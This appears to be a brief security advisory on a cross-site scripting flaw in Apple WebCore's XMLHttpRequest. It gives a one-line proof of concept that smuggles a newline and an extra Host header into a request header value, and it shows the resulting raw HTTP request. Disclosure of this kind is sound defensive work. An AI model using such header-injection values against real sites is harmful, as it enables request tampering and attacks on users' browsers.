Apple WebCore XMLHTTPRequest Cross-Site Scripting Vulnerability

Apple WebCore XMLHTTPRequest Cross-Site Scripting Vulnerability

An attacker can exploit this issue by enticing victims into visiting a malicious website.

The following example is available:

xmlhttp.setRequestHeader('Foo', 'baa\nHost: test\n');

The above request is treated as valid and results in:

GET / HTTP/1.1
Accept-Encoding: gzip, deflate
Accept-Language: en
Foo: baa
Host: test